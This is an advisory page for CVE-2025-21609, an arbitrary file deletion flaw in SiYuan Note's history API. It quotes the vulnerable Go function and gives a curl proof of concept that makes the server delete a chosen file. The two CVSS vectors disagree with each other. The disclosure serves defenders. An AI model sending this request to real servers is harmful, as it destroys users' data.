logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-21609 github.com/siyuan-note/siyuan/kernel

Package

Manager: go
Name: github.com/siyuan-note/siyuan/kernel
Vulnerable Version: >=0 <0.0.0-20250103014808-d9887aeec1b2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:U/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00199 pctl0.42118

Details

SiYuan has an arbitrary file deletion vulnerability ### Summary A **arbitrary file deletion vulnerability** has been identified in the latest version of Siyuan Note. The vulnerability exists in the `POST /api/history/getDocHistoryContent` endpoint.An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server. ### Details The vulnerability can be reproduced by sending a crafted request to the `/api/history/getDocHistoryContent` endpoint. Sending a request to the `/api/history/getDocHistoryContent` like: ``` curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}' ``` Replace `<abs_filepath_of_a_file>` with the absolute file path of the target file you wish to delete. The `historyPath` parameter in the payload is processed by the `func getDocHistoryContent` in `api/history.go:133`. In turn, `historyPath` is passed to the `func GetDocHistoryContent` located in `model/history.go:150` , which is the slink of the vulnerability. if `historyPath` exists and does not satisfy the `filesys.ParseJSONWithoutFix`, then it will be deleted by `os.RemoveAll` ```go func GetDocHistoryContent(historyPath, keyword string, highlight bool) (id, rootID, content string, isLargeDoc bool, err error) { if !gulu.File.IsExist(historyPath) { logging.LogWarnf("doc history [%s] not exist", historyPath) return } data, err := filelock.ReadFile(historyPath) if err != nil { logging.LogErrorf("read file [%s] failed: %s", historyPath, err) return } isLargeDoc = 1024*1024*1 <= len(data) luteEngine := NewLute() historyTree, err := filesys.ParseJSONWithoutFix(data, luteEngine.ParseOptions) if err != nil { logging.LogErrorf("parse tree from file [%s] failed, remove it", historyPath) os.RemoveAll(historyPath) return } ... } ``` ### PoC ``` curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}' ``` ### Impact arbitrary file deletion vulnerability

Metadata

Created: 2025-01-03T16:24:34Z
Modified: 2025-01-03T19:26:05Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-8fx8-pffw-w498/GHSA-8fx8-pffw-w498.json
CWE IDs: ["CWE-459", "CWE-552"]
Alternative ID: GHSA-8fx8-pffw-w498
Finding: F082
Auto approve: 1